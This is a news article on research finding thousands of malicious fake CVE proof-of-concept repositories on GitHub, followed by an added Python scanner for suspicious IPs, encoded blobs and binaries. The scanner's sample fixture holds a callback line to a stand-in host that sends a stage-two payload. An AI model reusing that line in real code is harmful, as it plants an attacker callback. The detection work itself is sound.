Security experts targeted with malicious CVE PoC exploits on GitHub

Researchers discovered thousands of GitHub repositories that offer fake proof-of-concept (PoC) exploits for various flaws used to distribute malware.


A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin The and Olga Gadyatskaya) discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities.

The experts analyzed PoCs shared on GitHub for known vulnerabilities discovered in 2017-2021 and found that some of these repositories were used by threat actors to spread malware.


The experts pointed out that public code repositories provide no guarantee that any given PoC comes from a trustworthy source.


“We discovered that not all PoCs are trustworthy. Some proof-of-concepts are fake (i.e., they do not actually offer PoC functionality), or even malicious: e.g., they attempt to exfiltrate data from the system they are being run on, or they try to install malware on this system,” reads the research paper published by the experts.


The team looked for a set of symptoms in the collected dataset: calls to malicious IP addresses, encoded malicious code, and bundled Trojanized binaries. Of the 47,313 repositories the researchers analyzed, 4,893 were malicious (i.e. 10.3% of the studied repositories show symptoms of malicious intent).
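A triage scanner for the three symptoms named above (hardcoded remote IP addresses, encoded blobs, bundled binaries), written here as an added Python example that is not the paper's or the authors' tooling; the sample repository, the documentation-range address 203.0.113.10, the stage-two blob and the CVE placeholder are all constructed, and the loopback/RFC1918 allow-list is an assumption about what a lab PoC normally targets.

```python
import base64, binascii, ipaddress, re

# Loopback/RFC1918 literals are normal for a lab PoC; other hardcoded IPv4 literals are flagged.
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long base64-looking runs
BINARY_MAGICS = (b"MZ", b"\x7fELF")               # PE / ELF file headers

def remote_ips(text):
    hits = []
    for lit in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(lit)
        except ValueError:          # "999.1.2.3" or a version string
            continue
        if not any(ip in net for net in LOCAL_NETS):
            hits.append(str(ip))
    return hits

def encoded_blobs(text):
    hits = []
    for run in B64_RE.findall(text):
        if re.fullmatch(r"[0-9a-fA-F]+", run):   # a SHA-256 in a README is not a payload
            continue
        try:
            base64.b64decode(run, validate=True)
        except binascii.Error:      # base64-looking but not decodable
            continue
        hits.append(run)
    return hits

def scan_repo(files):  # files maps path -> bytes; returns symptoms keyed by type
    findings = {"remote_ips": [], "encoded_blobs": [], "binaries": []}
    for path, data in files.items():
        if data.startswith(BINARY_MAGICS):
            findings["binaries"].append(path)
            continue
        text = data.decode("utf-8", errors="replace")
        findings["remote_ips"] += remote_ips(text)
        findings["encoded_blobs"] += encoded_blobs(text)
    return findings

# Constructed sample repo: README with a hash (benign), a callback script with a stage-two blob, a PE.
STAGE2 = base64.b64encode(b"echo constructed-stage-two-payload-marker").decode()
SAMPLE_REPO = {
    "README.md": b"# PoC for CVE-XXXX-YYYY (placeholder id)\nsha256: " + b"ab" * 32,
    "exploit.py": ("s = socket.create_connection(('203.0.113.10', 4444))\n"
                   f"s.send(base64.b64decode('{STAGE2}'))\n").encode(),
    "helper.exe": b"MZ\x90\x00" + b"\x00" * 60,
}
```

Treat hits as triage signals rather than verdicts: a non-private address can be a legitimate target host, and a payload shorter than the 40-character threshold or split across string fragments will not be caught.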


“This figure shows a worrying prevalence of dangerous malicious PoCs among the exploit code distributed on GitHub,” continues the paper.

